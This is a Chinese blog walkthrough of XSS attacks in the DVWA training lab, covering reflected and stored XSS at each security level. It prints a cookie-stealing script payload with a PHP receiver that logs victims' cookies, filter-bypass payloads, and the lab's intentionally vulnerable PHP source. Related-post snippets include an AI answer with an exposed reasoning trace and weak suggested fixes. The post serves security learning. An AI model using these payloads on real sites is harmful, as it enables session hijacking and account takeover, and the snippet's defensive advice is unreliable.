DVWA亲测XSS漏洞

最新推荐文章于 2025-04-07 23:15:21 发布
最新推荐文章于 2025-04-07 23:15:21 发布
阅读量1.5k 收藏 24
点赞数 23
文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2401_88220102/article/details/144404623
版权

首先需要有配置好的DVWA环境,像下图这样

 

其中:     

XSS (DOM) :  DOM型XSS漏洞

XSS (Reflected) : 反射性XSS漏洞

 XSS (Stored) :  存储型XSS漏洞

我们先来看XSS(Reflected): 反射型的XSS漏洞

首先,我们选择LOW等级

XSS (Reflected) :

点击出现如图所示

我们先来输入  xss  ,点击确定

我们接着来输入<xss> ,点击确定

这时发现插入html标签的话,页面会发生变化,我们尝试js弹窗

我们继续输入<script>alert('xss')</script>,点击确定

这时说明这个网站可以进行XSS攻击,我们输入 <script>document.location='http://127.0.0.1/cookie.php?cookie='+document.cookie</script> ,就可以得到要攻击的人cookie信息

 攻击过程总结:

 1.攻击者的web设计用来接收cookie,如下:

 

<?php $cookie = $_GET['cookie']; file_put_contents('cookie.txt',$cookie) ?>
 

 

2.构造并发送攻击url:
 

 

 

http://127.0.0.1/DVWA/vulnerabilities/xss_r/?name=<script>document.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script>
 

注意:<script>document.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script>需要进行
 

URLlencode的编码,否则不会攻击成功
 

 

3.得到cookie后,我们访问login.php 登陆页面,使用firebug里面的cookies,来编辑cookies
 

 
 

 

4.完成后,我们直接访问index.php,发现我们已经已被攻击者的身份登陆,可以赶我们想干的事情了
 

 

 

接下来我们选择Medium等级的XSS
 

 

 

XSS (Reflected) :
 

点击出现如图所示
 

 

我们先来输入<script>alert('xss')</script>  ,点击确定
 

 
 

 

发现已经失效,无法正常弹窗,<script>标签被过滤了,不过我们也有方法
 

1. <scri<script>pt>  应为过滤程序只会过滤一次,嵌套可以完美绕过。
 

输入<scr<script>ipt>alert('xss')</script>   
 

 

2.   <ScRiPt>   大小写混合绕过
 

输入<ScRiPt >ipt>alert('xss')</ScRiPt >
 

 

 

 

接下来我们选择High等级的XSS
 

 

XSS (Reflected) :
 

点击出现如图所示
 

 

我们先来输入<script>alert('xss')</script>  ,点击确定
 

 
 

 

我们尝试嵌套,大小写,发现都是失效的
 

 

但是能够插入xss代码的标签并不只是<script>,
 

还有<img>标签,同样也可以
 

 

输入 <img src=x οnerrοr=alert('xss')>,点击确定
 

 
 

 

 

onerror事件会在文档或图像加载过程中发生错误时被触发
 

应为src=x本事就是一个错误代码,所以触发事件执行
 

 

还有<iframe>标签同样可以:
 

输入 <iframe οnlοad=alert('xss')>,点击确定
 

 
 

 

 

<iframe>标签可以在一个html代码中嵌入另一个html内容
 

onload 是js的一个事件,事件会在页面加载完成后,立即发生,同时执行被调用的程序。
 

注意:1. 加载页面时,触发onload事件
 

 

 

接下来我们选择Impossible等级的XSS,当然这个等级是绝对安全的
 

 

 

XSS (Reflected) :
 

点击出现如图所示
 

 

我们先来输入<script>alert('xss')</script>  ,点击确定
 

 
 

 

发现代码原封不动的输出出来了,我们通过fire bug 查看元素
 

 
 

 

 

htmlspecialchars() 函数把预定义的字符转换为 HTML 实体
 

我们输入的符号都被转义了,使他们丧失了功能
 

 

查看后台代码
 

 

 

<?php // Is there any input? if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Check Anti-CSRF token checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); // Get input $name = htmlspecialchars( $_GET[ 'name' ] ); // Feedback for end user $html .= "<pre>Hello ${name}</pre>"; } // Generate Anti-CSRF token generateSessionToken(); ?>
 

 

原来是htmlspecialchars()这个函数把符号给编码了
 

 
 

 

 

 

接下来让我们来看XSS(Stored): 存储型XSS漏洞
 

 

首先,我们选择LOW等级
 

 

点击出现如图所示
 

 

是留言板性质的
 

我们先来尝试输入
 

 

发现输入不完整,估计是后台的输入框限制了长度
 

先查看源代码
 

 

 

果然不出所料
 

然后我们用火狐浏览器上的Tamper date 进行抓包改包
 

 

 

点击发送就可以成功绕过
 

或者我们可以用你黑客最常用的工具 burpsuite 就进行抓包:
 

 

 

然后改包:
 

 

 

 结果 :
 

 

 

 

 

 这样就简简单单突破限制
 

 

 

下面我们进入Middem等级
 

 

 

点击确定后
 

 

 

我们发现name中还是限制了字数,但在Low等级中我们已经列出解决办法,这里不再赘述
 

我们在Message表格中写入<script>alert('xss')</script>,发现如下图
 

 

 

发现<script>标签被过滤,此处我们也已经列出过解决办法,也不再赘述
 

抓包改包,用大小写混合的方法就可以成功绕过
 

 

我们看一下源代码:
 

 

 

<?php
 
if( isset( $_POST[ 'btnSign' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
 
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );
 
    // Sanitize message input
    $message = stripslashes( $message );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );
 
    // Sanitize name input
    $name = stripslashes( $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $name = htmlspecialchars( $name );
 
    // Update database
    $data = $db->prepare( 'INSERT INTO guestbook ( comment, name ) VALUES ( :message, :name );' );
    $data->bindParam( ':message', $message, PDO::PARAM_STR );
    $data->bindParam( ':name', $name, PDO::PARAM_STR );
    $data->execute();
}
 
// Generate Anti-CSRF token
generateSessionToken();
?>
 

 

这代码不可谓不精细,message防注入做的很棒
 

 

addslashes() 函数返回在预定义字符之前添加反斜杠的字符串。
 

htmlspecialchars() 函数把预定义的字符转换为 HTML 实体
 

 

 

接下来我们进入High等级
 

 

 点击确定后
 

 

我们在Message处尝试输入<script>alert('xss')</script>
 

 

 

我们又遇到了meddiem的问题:
 

 

 

<?php if( isset( $_POST[ 'btnSign' ] ) ) { // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = trim( $_POST[ 'txtName' ] ); // Sanitize message input $message = strip_tags( addslashes( $message ) ); $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); $message = htmlspecialchars( $message ); // Sanitize name input $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name ); $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); // Update database $query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );"; $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' ); //mysql_close(); } ?>
 

发现name已经完全过滤了<script>,区分大小写,以前的方法都失效了
 

这时我们采取新办法,我们在name中输入 <img src=x οnerrοr=alert('xss')>
 

发现成功绕过
 

 

 

接下来我们进入不可能注入的impossible等级
 

 

这时我们先来看代码
 

 

 

<?php if( isset( $_POST[ 'btnSign' ] ) ) { // Check Anti-CSRF token checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); // Get input $message = trim( $_POST[ 'mtxMessage' ] ); $name = trim( $_POST[ 'txtName' ] ); // Sanitize message input $message = stripslashes( $message ); $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); $message = htmlspecialchars( $message ); // Sanitize name input $name = stripslashes( $name ); $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : "")); $name = htmlspecialchars( $name ); // Update database $data = $db->prepare( 'INSERT INTO guestbook ( comment, name ) VALUES ( :message, :name );' ); $data->bindParam( ':message', $message, PDO::PARAM_STR ); $data->bindParam( ':name', $name, PDO::PARAM_STR ); $data->execute(); } // Generate Anti-CSRF token generateSessionToken(); ?>
 

mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。
 

下列字符受影响:
 

  • \x00
  • \n
  • \r
  • \
  • '
  • "
  • \x1a
 

如果成功,则该函数返回被转义的字符串。如果失败,则返回 false。

                

        

         

    

  



    



                



	

		

			

				
					
使用burpsuite进行自动化XSS漏洞的两种方法

				
			

			

				

					Cwillchris的博客
				

				

					07-08
					
					1943
					
				

			

		

		

			
				
一、使用 burpsuite 进行自动化XSS 漏洞我们使用之前搭建的DVWA靶机进行实验进入centos靶机,启动 apache 服务└─# systemctl start apache2进入kali拷贝 payload 字典到 root 目录下,字典可以使用 Kali 中自带的,也可以使用网上找的└─# cp /usr/share/wordlists/wfuzz/Injections/XSS.txt /root在火狐中访问: 192.168.98.66/DVWA-master/vulnerabil

			
		

	



                

            
              



	

		

			

				
					
通过DVWA学习DOM型XSS

				
			

			

				

					Mi1k7ea
				

				

					01-02
					
					4208
					
				

			

		

		

			
				
下了个新版的DVWA看了下,发现新增了好几个Web漏洞类型,就玩一下顺便做下笔记,完善一下之前那篇很水的DOM XSS文章,虽然这个也很水 :)

基本概念

DOM,全称Document Object Model,是一个平台和语言都中立的接口,可以使程序和脚本能够动态访问和更新文档的内容、结构以及样式。

DOM型XSS其实是一种特殊类型的反射型XSS,它是基于DOM文档对象模型的一种漏洞,其触...

			
		

	



              


  
              

                


	

		

			

				
					
【无标题】DVWA靶场之xss漏洞

				
			

			

				

					weixin_46954909的博客
				

				

					05-17
					
					1253
					
				

			

		

		

			
				
alert(1)

			
		

	





	

		

			

				
					
dvwa篇之文件包含漏洞低、中、高三个级别的演示(小白必备!!!)

					
最新发布

				
			

			

				

					qq_61426144的博客
				

				

					04-07
					
					842
					
				

			

		

		

			
				
简介:文件包含其初衷是应用于在后端脚本中把一些重复的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无需再次进行编写,这种调用文件的过程一般被称为文件包含,其本身并没有什么危害,但是如果对包含的参数可控,那么在这一过程中就会产生文件包含漏洞,而文件包含又分为本地文件包含和远程文件包含。

			
		

	



		

			
		



	

		

			

				
					
DVWA-XSS (Reflected)-反射型XSS

				
			

			

				

					seanyang_的博客
				

				

					06-12
					
					3781
					
				

			

		

		

			
				
XSS攻击,是指攻击者在Web页面中输入恶意的JavaScript脚本,而Web应用程序没有对用户的输入进行过滤或处理就直接执行,将结果输出在网页中。如果恶意JavaScript脚本被存储到后端服务器中,用户打开该Web页面时,恶意脚本则可能在浏览器中自动执行。XSS攻击依赖于JavaScript脚本的执行。一般,攻击者插入恶意脚本后,需要将脚本执行结果显示出来,因此,XSS攻击常见于网站中有用户输入且能够显示的地方,如文章发表、评论回复、留言板等。

			
		

	





	

		

			

				
					
DVWA-XSS

				
			

			

				

					qq_58091216的博客
				

				

					04-19
					
					5783
					
				

			

		

		

			
				
一.DOM型xss

1.low

(1)我们知道最基础的xss攻击就是<script>alert(/xss/)</script>

(2)我们看到english直接按select,可以看到?default=English,我们知道在?default后面进行xss攻击



(3)我们直接输入<script>alert(/xss/)</script>,可以看到弹窗



(4)因为low比较简单所以我把分析源代码放在了最后。可以看到没有如何防御



2.m.

			
		

	





	

		

			

				
					
DVWAXSS漏洞_dvwa xss

				
			

			

				

					小司机的奥拓
				

				

					02-20
					
					1571
					
				

			

		

		

			
				
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”与“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。

			
		

	





	

		

			

				
					
DVWA靶场XSS漏洞通关教程及源码审计

				
			

			

				

					m0_74786138的博客
				

				

					01-25
					
					1242
					
				

			

		

		

			
				
公众号:泷羽Sec-track。

			
		

	





	

		

			

				
					
DVWA——XSS注入复现

				
			

			

				

					qq_62056583的博客
				

				

					07-13
					
					2043
					
				

			

		

		

			
				
在对DVWA靶场漏洞复现前,先了解一下XSS漏洞的相关知识攻击者利用它向网页中注入恶意的客户端脚本,使得用户在访问页面时执行这些恶意脚本,从而达到攻击的目的。这种攻击通常利用了网站未对用户输入进行充分过滤或转义的情况。XSS的攻击方式分为三种,分别是:分别为反射型(Reflected),存储型(Stored)和DOM型。:只是简单地把用户输入的数据反射给浏览器,简单来说,黑客往往需要用户诱使用户点击一个恶意链接,才能攻击成功。(经后端,不经数据库):将用户输入的数据存储在服务器端。

			
		

	





	

		

			

				
					
网络安全-靶机dvwaXSS注入Low到High详解(含代码分析)_dvwa xss注入

				
			

			

				

					2401_84300255的博客
				

				

					04-27
					
					976
					
				

			

		

		

			
				
正常可以看到是Get型。

			
		

	





	

		

			

				
					
DVWA XSS漏洞

				
			

			

				

					qq_49422880的博客
				

				

					09-02
					
					579
					
				

			

		

		

			
				
Reflected XSS

Low

medium

high

impossible

Store XSS

Low

这个场景就是模拟网络留言板的Xss注入,这里有两个对话框,我们都将我们的注入语句插入其中寻找注入点,发现注入点在我们所提交的内容<script>alert("mohe xss")</script>上,毕竟是Low所以直接过。



medium

    审计一下代码,发现也只是一个简单的匹配过滤而已,双写绕过即可。而且注入点是在name那里,所以我们...

			
		

	





	

		

			

				
					
dvwa xss漏洞

				
			

			

				

					qq_51177088的博客
				

				

					05-24
					
					317
					
				

			

		

		

			
				
@[TOC](xss)
原理
个人觉得,是和sql有很大相似之处的,都是利用嵌入恶意代码造成注入,一般使用JavaScript进行构造
分类

反射型
存储型
DOM型

注入及绕过

试注入敏感字符被转义是否以及探输出位置
是否需要闭合
内容若是在标签内则无需闭合,如果在标签属性则需要闭合标签后再输出
构造xss

在标签内:
<script>alert(1);</script>
在属性内:
"/><script>alert(1)</script>

			
		

	





	

		

			

				
					
dvwa———xss(全)

				
			

			

				

					GZY0601的博客
				

				

					09-28
					
					2820
					
				

			

		

		

			
				
这个章节我们来讲一下xss攻击XSS 又称CSS(Cross Site Scripting)或跨站脚本攻击,攻击者在网页中插入由JavaScript编写的恶意代码,当用户浏览被嵌入恶意代码的网页时,恶意代码将会在用户的浏览器上执行。xss有三种:反射型(Reflected),存储型(Stored)和DOM型反射型xss:只是简单地把用户输入的数据反射给浏览器,简单来说,黑客往往需要用户诱使用户点击一个恶意链接,才能攻击成功。(经后端,不经数据库)存储型XSS:将用户输入的数据存储在服务器端。

			
		

	





	

		

			

				
					
dvwa中的xss(跨站脚本)攻击

				
			

			

				

					无痕的博客
				

				

					01-17
					
					2982
					
				

			

		

		

			
				
xss攻击介绍与在dvwa中的xss攻击演示

			
		

	





	

		

			

				
					
DVWA------XSS(全)

				
			

			

				

					m0_65712192的博客
				

				

					12-13
					
					7205
					
				

			

		

		

			
				
DVWA-----XSS(全)

			
		

	





	

		

			

				
					
DVWAXSS (完整版)

				
			

			

				

					一期一会的博客
				

				

					03-30
					
					5796
					
				

			

		

		

			
				
xss  DOM型xss

			
		

	





	

		

			

				
					
DVWA学习之XSS(跨站脚本攻击)

				
			

			

				

					mmxhappy的专栏
				

				

					02-04
					
					1162
					
				

			

		

		

			
				
跨站脚本攻击XSS(Cross Site Script) 为了不和层叠式演示表(Cascading Style Sheets,CSS) 的缩写混淆,顾将跨站脚本攻击缩写为XSS。恶意攻击者网web页面插入恶意Script代码,当用户浏览该页面时,嵌入web里面的script代码就会被执行,从而达到攻击用户的目的。XSS攻击针对的是用户层面的攻击!

			
		

	





	

		

			

				
					
DVWA靶场——XSS(Stored)

				
			

			

				

					 sucker的博客
				

				

					12-02
					
					2017
					
				

			

		

		

			
				
标签和alert关键字的机制。2,使用最简单的XSS漏洞试语句进行试,但是要先判断存在漏洞的注入点,payload:<script>alert('XSS')

			
		

	





	

		

			

				
					
dvwa 中 sql xss 漏洞

				
			

			

				

					weixin_62420492的博客
				

				

					01-25
					
					3266
					
				

			

		

		

			
				
SQL Injection
medium
先观察页面,可以看到url中没有注入点,应该是post注入

使用burpsuite抓包,并将此报文send to repeater

第一次把id=1改为Id=1’
第二次改为id=1’’
send之后看response,从结果可见,这里输入是数值,不需要闭合,并且单引号应该是会被转义的

确定列数
id=1 order by 3 报错,列数为2列
爆库
id =1 union select 1,database
得到库名dvwa
爆表
id=1 union se

			
		

	





	

		

			

				
					
DVWA存储型XSS

				
			

			

				

					03-30
				

			

		

		

			
				
<think>嗯,用户想了解DVWA中的存储型XSS漏洞示例及防御方法。首先,我得回忆一下DVWA是什么,DVWA是一个用于练习Web应用漏洞的平台,包含不同难度的漏洞环境。存储型XSS是其中一种漏洞类型,恶意脚本被存储在服务器上,比如数据库里,当其他用户访问时就会执行。

根据用户提供的引用,特别是引用1和2,里面提到了存储型XSS的原理和不同安全等级(Low、Medium、High、Impossible)的处理方式。需要分别分析每个级别的示例和防御方法。比如在Low级别,可能没有任何过滤,直接输入脚本就会被存储;Medium级别可能有一些过滤,比如转义<script>标签;High级别可能有更严格的过滤或使用黑名单;而Impossible级别可能结合了输入验证和输出编码,或者使用CSRF令牌。

还要注意用户提到的引用3,虽然主要讲反射型XSS,但防御方法可能有共通之处,比如输入过滤和输出编码。需要确保回答中涵盖不同级别的示例代码,比如PHP中的处理方式,以及如何通过输入验证、输出编码、内容安全策略(CSP)等方式进行防御。

用户可能需要具体的漏洞示例,比如在留言板中注入<script>alert('XSS')</script>,然后展示不同级别的后端代码如何处理。同时,防御方法需要分点说明,比如输入验证、输出编码、CSP、HttpOnly Cookie等,确保结构清晰。

另外,用户可能希望了解如何实际操作,比如在DVWA中如何试这些漏洞,以及防御措施的具体实现。需要确保回答中的代码示例正确,比如使用htmlspecialchars函数进行输出编码,或者使用正则表达式过滤特定标签。

最后,生成相关问题时要围绕存储型XSS的不同方面,比如各等级区别、实际应用中的案例、CSP的作用、HttpOnly如何帮助防御,以及与其他XSS类型的比较。确保问题能帮助用户进一步深入理解。</think>### DVWA 存储型 XSS 漏洞示例及防御方法

#### 一、存储型 XSS 漏洞示例
在 DVWA 中,存储型 XSS 漏洞常出现在用户输入持久化存储的场景,例如留言板功能。攻击者提交包含恶意脚本的内容后,脚本会被存入数据库,其他用户访问时自动执行该脚本。  
**示例代码(Low 级别未过滤):**
```php
// 后端处理代码(Low级别)
$message = $_POST['mtxMessage'];
$name    = $_POST['txtName'];
$query = "INSERT INTO guestbook (comment, name) VALUES ('$message', '$name');";
```
攻击者可输入以下内容实现攻击:  
`<script>alert('XSS')</script>`  
当其他用户查看留言时,脚本会触发弹窗[^1][^2]。

#### 二、不同安全等级的防御方法
1. **Low 级别(无过滤)**  
   - **漏洞原因**:直接拼接用户输入到 SQL 语句,未做过滤。  
   - **修复建议**:对用户输入进行 HTML 实体编码,例如使用 PHP 的 `htmlspecialchars()` 函数:  
     ```php
     $message = htmlspecialchars($_POST['mtxMessage'], ENT_QUOTES, 'UTF-8');
     ```

2. **Medium 级别(部分过滤)**  
   - **漏洞原因**:使用 `stripslashes()` 和 `htmlspecialchars()` 但未完全覆盖所有危险字符。  
   - **修复示例**:  
     ```php
     $message = strip_tags($_POST['mtxMessage']); // 移除 HTML 标签
     ```

3. **High 级别(严格过滤)**  
   - **漏洞原因**:使用正则表达式黑名单过滤 `<script>` 标签,但可能被其他标签绕过。  
   - **修复示例**:  
     ```php
     $message = preg_replace('/<script.*?>/i', '', $_POST['mtxMessage']); // 过滤 script 标签
     ```

4. **Impossible 级别(综合防御)**  
   - **防御方法**:  
     - 输入验证:仅允许特定字符(如字母、数字)。  
     - 输出编码:强制使用 `htmlspecialchars()`。  
     - CSRF 防护:添加 Token 验证[^1]。  
     ```php
     $message = htmlspecialchars(strip_tags($_POST['mtxMessage']), ENT_QUOTES, 'UTF-8');
     ```

#### 三、通用防御策略
1. **输入验证**  
   - 使用白名单机制限制输入格式(如正则表达式 `/[a-zA-Z0-9\s]+/`)。  
2. **输出编码**  
   - 对动态内容进行 HTML 编码(如 PHP 的 `htmlentities()`)。  
3. **内容安全策略(CSP)**  
   - 通过 HTTP 头限制脚本来源:  
     ```http
     Content-Security-Policy: default-src 'self'
     ```  
4. **HttpOnly Cookie**  
   - 设置 Cookie 的 `HttpOnly` 属性防止通过 `document.cookie` 窃取。

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值